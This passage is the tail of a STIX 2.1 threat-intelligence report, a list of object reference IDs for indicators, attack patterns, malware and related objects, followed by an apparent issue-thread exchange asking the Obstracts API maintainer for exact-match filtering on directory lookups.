"indicator--69bd3a35-da0a-5ad4-a188-1deb84230e4c",
"file--eea82830-6ffb-510f-9aa6-ef6c837a0783",
"relationship--28b44884-a77e-52ba-80d5-61cb8e445fd2",
"indicator--c370fedc-1cbc-5b79-9118-cf381d9a41a1",
"file--6ac71a33-b01f-52a2-9c2c-63b7c6547f7a",
"relationship--28ce86eb-0ae0-5c64-a399-cdd02c8468c1",
"indicator--644c9604-7d17-5017-9fb2-e29a4745bb6b",
"file--2d3e06bd-e34f-5d32-8979-3c3207777d06",
"relationship--fb6dac13-5242-5411-935b-18a13db19a41",
"indicator--73284855-7303-56df-9c5f-990dff7eb4fb",
"file--98de85be-ddf8-5eec-8610-e6f7e30826d0",
"relationship--6e3f400f-d4e9-5f95-b5e6-c54808a4146a",
"indicator--0c6bc558-c85c-53f8-9639-ceec03f657c4",
"file--8a8e81bd-a21d-5976-9d59-d2fe8544a441",
"relationship--28dd613f-d2ee-598b-aac4-0d4da07a9191",
"indicator--3d88da10-7f03-598c-afcb-50fc0eead681",
"file--bd270365-db8b-5ca5-9168-d04a25f43a93",
"relationship--dd40a957-47ae-567e-99e3-3c538f26cf95",
"indicator--5e75a425-ff1f-5fca-b02e-7fcbf1aee3a0",
"file--2facd814-e6fc-57f4-aaa0-a104bad49889",
"relationship--1ce8b7cf-cb90-51a4-9d6f-a156d9a91ce8",
"indicator--4d7fc969-f1fd-575b-9e35-2922e8bcabc0",
"file--e40f4918-2657-5113-901a-59ccabe1d3c4",
"relationship--4821475f-b12b-5c3b-81b4-b4548984d4ca",
"indicator--0afe20c4-e038-51d5-aede-6747c6971c6c",
"file--07b53740-fd6a-58e9-8c32-37772ec92c05",
"relationship--8eae4177-16a1-5bcc-b9cb-bedb8568986a",
"indicator--05869fb1-8a4e-5b7a-9d3f-45cc0d231b97",
"domain-name--8ede6429-058c-5f3a-9ae2-5c3038a20c1c",
"relationship--1d3ea87f-f698-5b73-9639-0829d2a68472",
"indicator--148e178c-60a0-5338-b48f-10823362f219",
"domain-name--5b7e06bc-a09b-5ad1-a17d-a9c0f765a3b1",
"relationship--6bc74c13-5506-56a9-8daa-74f03ea1efab",
"indicator--77df1318-1548-56bd-95e8-47baa8f05f22",
"domain-name--9695a0ee-35b7-57d8-bf50-586c07aac6f3",
"relationship--10f8b37f-7766-5e94-9546-0ed915c3eeb6",
"indicator--2e285e19-f3b9-5877-89d9-2a643070da2a",
"domain-name--e889795d-3cb4-5728-bbe9-837f16d69893",
"relationship--1628302c-6771-5e59-a620-5b9c1c73612c",
"indicator--b592b740-2a01-5076-8813-f35c205edb70",
"domain-name--7434e46c-e1d3-5eac-b1a3-ae6f56cb0d2e",
"relationship--8bfedeba-8648-5913-85e8-f633b235e625",
"indicator--3dce55fc-65ad-567a-ae76-424a2991cb2a",
"domain-name--35a35b26-6e2b-51eb-9699-c1f397df4874",
"relationship--755c3d79-87bb-5d6e-980e-12f27b635e2d",
"indicator--942fd8a0-d258-5a95-bf08-85217ca54533",
"domain-name--74f72770-56bc-5595-a16d-04bd86b5237c",
"relationship--f90ef73a-4450-5b1a-86b2-16f8f91b9bbd",
"indicator--5ee34923-de79-5cc1-9ba9-0bbdda8bc66d",
"domain-name--dd686e37-6889-53bd-8ae1-b1a503452613",
"relationship--4cae20d3-5913-5afa-aea1-c72b8a0a03de",
"indicator--3c47d4cd-fd91-58a4-bbee-ee9b8eba92c0",
"domain-name--4890eaaf-953b-5985-a096-9e90f0a27da9",
"relationship--548b5c59-727d-5a47-b4f7-4bfbe8e070fa",
"indicator--fe74e627-39e0-5c56-bec1-cb2720ff1ee2",
"domain-name--5fe44c77-a18b-5f19-bad0-8ceaa66d4e25",
"relationship--5506ef54-fd31-59a5-a5e8-d9645a87afc3",
"indicator--c86a814b-9074-5067-b719-9e5a63196393",
"domain-name--73087b89-df73-57b6-8b83-19d276c39d28",
"relationship--b114681d-8c99-5bc4-bbc7-9c4560dff438",
"indicator--6fda002f-0f9a-5a71-9fe9-537b564c6513",
"domain-name--22f8ee59-c26b-5195-b7f7-e1c7406e54b5",
"relationship--b1faaa1f-8d28-5bd2-94f9-25f5392737e3",
"indicator--e4be76c6-22e9-5440-b4fb-93dc9613d7a7",
"url--4f641666-bd70-5d42-9598-8a170a1872a7",
"relationship--a842f5bc-1c3d-589e-b6bc-9212aea87bcb",
"indicator--82358afb-7830-5c6c-bdf7-0d1123ef228d",
"url--25c40db4-6478-5fd6-9ec0-df8cd3744703",
"relationship--a75967e4-9c13-5916-8a40-d33286d110db",
"indicator--93879e0d-f967-5862-b854-83572fed3e28",
"url--02c0f6a5-5dc3-5453-acc8-0e60d1055ec0",
"relationship--76c424aa-1e37-5c06-8436-be5ece2b4131",
"indicator--477b0519-7958-5fcf-850d-ec7ddc0b73a7",
"url--00b2c680-917a-5f2d-ae99-b06e2dfda9c0",
"relationship--14604393-8b43-56f3-8b05-5a7e6adb384a",
"indicator--7a289d58-d6eb-5bd6-a17f-f747be15d63d",
"url--84e6b675-2f3b-5a12-b01f-4f9085fbf310",
"relationship--0202c813-5262-5deb-b12b-1db92dde95dc",
"indicator--a1e8b3d1-ecd4-5ccc-8776-c8cbddf2ac47",
"url--507de22f-d46d-58ad-ac19-75b7091a019b",
"relationship--949d92b4-9704-55f5-ad08-0aebfc6cd1b4",
"indicator--4c472400-5d04-5ce7-a501-ee4e540af177",
"directory--d9c9c055-8e37-55a1-ba2b-79da4af27256",
"relationship--7f861d6e-0947-5500-b725-3dae90a6b18f",
"indicator--3920efb6-c03a-59a2-92bd-c99f64b60b2d",
"directory--9cbb5121-7a48-5719-8f2f-170809992f9b",
"file--d0f30fbf-7d0e-5941-b249-0568483f4874",
"relationship--c78e1856-03a7-5dd5-a811-53b47a54383b",
"indicator--980363ef-bd61-5d93-8df8-aadb1121fab3",
"directory--9e0e1d57-0014-5f16-9fe0-ff833515a1e1",
"file--b5b48763-1742-594c-a093-ee244936d6ab",
"relationship--4431feec-6e75-5a38-9418-854f8ddda8f4",
"indicator--17e8ef3a-7e81-5413-b2d4-b05aa8c4956c",
"directory--a73b6a51-1a7e-5700-b5a0-d0e110f86498",
"file--e2db2739-0307-5bfa-9fc6-24a871ceca92",
"relationship--12240918-6aa1-505b-bda1-e63ffe844153",
"indicator--d37283b2-51d3-51ce-87c5-8e362c40340b",
"directory--006bfd99-c377-5717-9168-45787a7b455a",
"relationship--b8cc9560-4f71-5be8-b67c-a5ea6d364215",
"indicator--8a6894a9-9f32-5e4f-8011-63de44efff0b",
"directory--9d5142ea-3041-5292-b76f-5b9091552621",
"relationship--db9a6e66-ad0b-506c-91a7-44ed70463140",
"indicator--e49938fb-a918-5ca4-bbd0-dfe6c922df44",
"directory--4bc10abe-bfef-519f-b868-3c43b01a09ff",
"relationship--01ee1109-c82b-524c-a128-7f07f0f9d459",
"indicator--865c4ed6-5d94-528f-996a-7b9c5454607e",
"file--701ea947-183a-5760-a50c-733042751773",
"relationship--6e7db705-27b2-5c49-9f1e-4d62e7d45724",
"indicator--b08cd7c8-3b7f-597f-8937-e43e7218d19f",
"file--efd603df-4375-5db4-a46f-89f6bfcd6495",
"relationship--8722b54d-e12d-5b96-8860-2f987b6697c0",
"indicator--fd45bac8-6eb8-510d-8987-89b436959e7b",
"file--1defde54-a859-5f87-904a-0a1d9e0c49ff",
"relationship--2326ad25-3d09-533f-8ceb-f256b9c8599b",
"indicator--f218927a-505c-53ea-a8d6-a36686c619d6",
"file--c6d89fa6-62d8-5f0d-8ed5-a29ad6013499",
"relationship--871aabf8-2258-5239-832f-27658d2b74ce",
"indicator--88abd148-5e30-58ab-822e-ef0c133958d0",
"file--f68010a1-c511-5ebe-b2ac-288961f4ced6",
"relationship--0983ef37-0f36-5b7f-827e-9998c4def511",
"indicator--1db23e90-f420-579e-b333-046e5e7fe284",
"file--6ececf6f-053c-5c70-b8e5-f9c28b56fc8a",
"relationship--5e817730-f6f6-59a9-b1a6-63a0ca3325d3",
"location--a090c7b9-1f8c-51c7-9d4c-f26bce6a4519",
"location--5367c604-bef1-5c20-afe0-cd8490f1a294",
"location--49cc6331-3c73-5221-882c-8144b88506e8",
"attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c",
"attack-pattern--4eb28bed-d11a-4641-9863-c2ac017d910a",
"attack-pattern--2bce5b30-7014-4a5d-ade7-12913fe6ac36",
"attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
"attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb",
"attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"attack-pattern--acd0ba37-7ba9-4cc5-ac61-796586cd856d",
"attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
"attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783",
"attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c",
"attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2",
"attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54",
"attack-pattern--e196b5c5-8118-4a1c-ab8a-936586ce3db5",
"identity--00115286-e08e-569f-815d-6c8b1af0364d",
"identity--6904c313-735b-5c5e-b8bc-3a3ca6842f0c",
"identity--76621f33-4f0f-5a79-9367-6523af40a0c9",
"identity--7f384a02-40c2-5942-b7ab-9d6b538b819c",
"identity--d259ca3d-0f87-57b3-b737-ebbeb0b20bbd",
"identity--c62409eb-920c-5cfa-94ae-66b3c77bfc7d",
"attack-pattern--b53d0eb3-4077-4b2c-acb2-4e629562d86f",
"attack-pattern--ac869698-83a2-44f1-a288-feeaa87f5bad",
"attack-pattern--867547bc-ea5a-4362-974f-53456cdce132",
"attack-pattern--fcdbc3da-ae9c-40bb-a271-5fb6c1859335",
"attack-pattern--0691115d-4430-446c-9071-1546ac5d17ca",
"attack-pattern--be7bcceb-c01b-4517-8cd6-18ed958b5563",
"campaign--2bbc99b2-df8e-4cef-838b-355529bc27b1",
"course-of-action--773a388a-35a7-4dcd-891b-c45cfdaf484b",
"course-of-action--6d93c592-78f6-4719-bac8-f820203f822a",
"course-of-action--4bae5bc6-8626-444c-83c6-939c896c9d00",
"identity--a1a0cecc-f23d-5946-b4c9-06171be68d66",
"identity--cf042429-9d3c-5901-8f7d-2fbf6bed10d3",
"identity--be0fd790-5332-5169-ad57-2de175028f8f",
"identity--676b2880-02df-5fb1-80a6-5380ca71f376",
"identity--2bceea2b-3f6e-50e3-8af3-79f971448613",
"infrastructure--46b65ef0-65e9-45f3-ba54-a6a31c3a7e38",
"infrastructure--d2e95be0-1eb9-4221-bdf1-fe270b88cf81",
"infrastructure--5cd98023-aa22-4b77-a625-51522b140fd9",
"infrastructure--99eb7c61-f168-4150-bb62-784e5476c932",
"infrastructure--48c20762-c864-4133-aa31-d461942a869f",
"malware--f9abba60-3c18-412b-b1e8-ed35d7bdfef7",
"tool--418064a5-0a3d-4d93-8ad6-0e5548033282",
"tool--c5dd5108-ef5c-4cea-9fdc-a36707308309",
"tool--fe483283-f26f-4455-ae24-a5a7a2d9a770",
"tool--f3b4289e-b2b1-4e1f-9cd6-3c43501241a3",
"tool--33f17bc4-2611-4afe-8d8d-ced2a21dce0c",
"tool--cb0fbb99-3590-4431-be2e-115be21d6c47",
"relationship--72489537-f30d-5be2-b5a6-2056c5e83503",
"relationship--91abb9e9-cc68-555b-86dc-be34115b796f",
"relationship--cf94e8b1-0d8d-57ba-9342-113358333b44",
"relationship--781b59a2-4c15-5f18-a921-89f87161e407",
"relationship--03099f5c-1bb6-56de-8fa9-eb050e732e28",
"relationship--ddf8a569-dfc9-5203-9197-b4cc23672504",
"relationship--71b8c8d5-e6ac-5bdd-ab2d-0daf9035d8d3",
"relationship--f24e608a-0857-5b6e-9f4d-e40c900702cb",
"relationship--135c0505-a313-5713-9c4a-2396033324e7",
"relationship--2c2872de-7899-59f5-8093-87c1c05328bf",
"relationship--6f512092-5f67-5ea1-a286-41fc9baf88f4",
"relationship--0fbb24bb-0f87-500c-a172-0ce2320fa2c7",
"relationship--462f3dc1-89c0-51ca-aebb-7c0f3b65c45e",
"relationship--df1a1677-a19d-5239-8294-23db0cae4c9e",
"relationship--689b17da-f0e5-5120-a56c-a36dca6ad740",
"relationship--4cbde12d-9d3b-5fc1-8f8b-eb96b88765da",
"relationship--2bfc5697-db6c-5cc8-951f-555356a2767a",
"relationship--ceff2c4f-4aec-5417-bfaf-45a0864e48ed",
"relationship--72ea6abf-6732-5c39-be78-7e1476835c07",
"relationship--27cf0d57-5ba7-58e9-9ec0-5614ae523a60",
"relationship--f00deba6-f37f-5d36-9779-f1d4419f8900",
"relationship--c81c3fe8-2cee-5b71-8474-571f7d07e438",
"relationship--20a04640-a6a6-5a89-a25d-bae7e32c8f4a",
"relationship--ae31fe0f-f4f9-5040-8806-eae9b8a6f591",
"relationship--c398c7a7-a733-5857-a015-ba6b6b4f7623",
"relationship--2fea314c-64b5-5c4d-9449-76483dd2a709",
"relationship--c530ef3d-a919-5668-ae57-2a7a77b4db50",
"relationship--dee17256-bf3a-55de-9ee2-30ec0231f48c",
"relationship--4bacf3ec-d204-5128-aeea-5ac5c2b7043f",
"relationship--85c4b73e-490e-5521-9d1c-5a74d786d212",
"relationship--9b4d2da0-d20b-57b2-ad43-66fb8e5bffe0",
"relationship--1c1d8f75-5d8c-5ab9-9b56-8001bc0f98e5",
"relationship--4885491c-13e7-55cf-864d-d6ae620c6260",
"relationship--0ab923d9-5b0f-52ba-a662-ff57f38d0b27",
"relationship--80124db2-7891-5956-b4e3-dcaa21f4f001",
"relationship--d3f3acaa-711e-55c5-99ca-e53cc9ddf881",
"relationship--e7797ec4-a1f5-5375-9920-97235d2d7efc",
"relationship--cd50927e-e97a-5cd0-adfa-1310ae941ad2",
"relationship--d1e0fdde-c9e9-5934-8aa3-918d3aec0c3c",
"relationship--2a657cde-105a-5581-ada2-03d224688257",
"relationship--1b0fd67a-1e1a-50fd-9a1d-43315af7b6f1",
"relationship--22c1c01d-6531-5103-8453-78385923ac61",
"relationship--2407af07-9ebf-5aa2-b37f-c3468500116f",
"relationship--aa7370b2-e284-5a2a-954f-815b6e338eb6",
"relationship--a73104e2-f989-5cad-9fd5-b9ec0a593c43",
"relationship--ae2fa97e-6de0-5752-9e75-07e0b29a0127",
"relationship--1b46da09-b0f8-512d-ae6e-84ba9a467914",
"relationship--a13802e1-2057-58e6-a979-8a8ee3b7827e",
"relationship--1963b82c-046b-5cec-9096-7fb8de0785ad",
"relationship--efbfe202-125d-523f-a1fc-7235fb8d804b",
"relationship--c0d877d7-dd7d-5e5d-b2de-979a9d6bfa18",
"relationship--26d56477-61ad-591e-bba2-a5b28b5398a7",
"relationship--ca8e8364-1c20-5285-88b2-18d6b3ca093b",
"relationship--432fa596-2c23-5a77-8eb1-13eded5b3bc2",
"relationship--d8f083fe-43ad-5e86-8eac-8caebad1da30",
"relationship--b6867239-9772-5a61-8576-590277155f57",
"relationship--22921922-1c9f-5726-a1c7-2e46c8b93b1a",
"relationship--62f4c7fd-73f6-583f-8a5f-e106b9493a91",
"relationship--d00e6663-8726-5de1-803e-cf44e558d58f",
"relationship--86cec3bf-ede5-5515-8b4b-9f7340a49c86",
"relationship--91c483fb-2ed2-5080-afd5-6e80ced0bb04",
"relationship--20159747-89c7-50fe-b138-7fcfe285f11b",
"relationship--6de3c75e-c7a9-5a02-ac2c-f3a9c24e012f",
"relationship--9c942d00-d3a5-55f0-9e3f-85b476bcc24b",
"relationship--58f5a4cb-fb65-5209-8168-02771a179a58",
"relationship--3d651015-833c-5dc1-a128-13299ea2dac9",
"relationship--51f6e254-f385-568c-bd8f-8b182163a8dd",
"relationship--38e29885-8f18-5883-bcd7-f0b870d7e2e1",
"relationship--3233e22b-f72b-5ad6-a76c-668179b397e5",
"attack-flow--280aec03-6c7d-54d0-87f9-cbe98058f47f",
"relationship--75e734dd-00a3-5512-945f-0049efda481f",
"x-mitre-tactic--d679bca2-e57d-4935-8650-8031c87a4400",
"attack-action--27a2cfda-acad-5b89-ae9f-12235ae137a7",
"x-mitre-tactic--2558fd61-8c75-4730-94c4-11926db2a263",
"attack-action--05a1bdad-840f-58a0-9d5e-16c92d238d69",
"attack-action--3b4d1bed-9007-51c4-9349-c39cc9cbb826",
"x-mitre-tactic--ffd5bcee-6e16-4dd2-8eca-7b3beedf33ca",
"attack-action--3ae71fee-ad7b-5291-ab6e-50776fb67c13",
"x-mitre-tactic--4ca45d45-df4d-4613-8980-bac22d278fa5",
"attack-action--03f5e6c8-4d18-591b-ba7d-6f4ef9a55ae2",
"x-mitre-tactic--f72804c5-f15a-449e-a5da-2eecd181f813",
"attack-action--d900c6a5-76b6-5e18-ac0c-18fac07d1924",
"x-mitre-tactic--78b23412-0651-46d7-a540-170a1ce8bd5a",
"attack-action--988f34ca-b6f7-5afd-88c9-3aa58033196d",
"attack-action--d2a2ac03-e5cf-5086-b223-3fc39843cfa3",
"attack-action--67af6809-6b89-5b74-a5be-68c25d27f454",
"attack-action--0c78108e-adb0-5070-8fb5-9a2229ccb060",
"attack-action--d50f3a64-695d-5f7e-bffb-86dc6cb6c047",
"attack-action--ef6e6421-2eea-5c46-8013-762124c0234d",
"x-mitre-tactic--5bc1d813-693e-4823-9961-abf9af4b0e92",
"attack-action--8d11404b-9f2c-58d6-9ec1-77e2058fcfd9",
"attack-action--3326e44e-e10c-5b3d-8e3d-088885eb2205",
"attack-action--35ac534a-313b-5a60-bd3d-7cfe20fbe252",
"attack-action--4b0c7736-8ab8-5067-a0b9-7e7193869cb5",
"attack-action--ad71338a-be45-56cb-8371-3bca4f660678",
"attack-action--c28d62ac-dad4-5912-96fd-b3fcf51a6d16",
"x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8",
"attack-action--62914ca2-1b87-5b86-b293-9834c851412e"
],
"published": "2025-07-23T12:00:00Z",
"spec_version": "2.1",
"type": "report"
},
@dgreenwood-dogesec thanks!
Is it possible to do an exact match on 'https://api.obstracts.com/v1/objects/scos/?page=1&types=directory&value=%2Fsys'?
You’re search returns 49 results. Ideally I only want one returned so that I don’t have to add any additional logic to parse the ID.
It’s not right now (and it should be!)
I am going to add this to our backlog with the aim of shipping it before the end of 2025 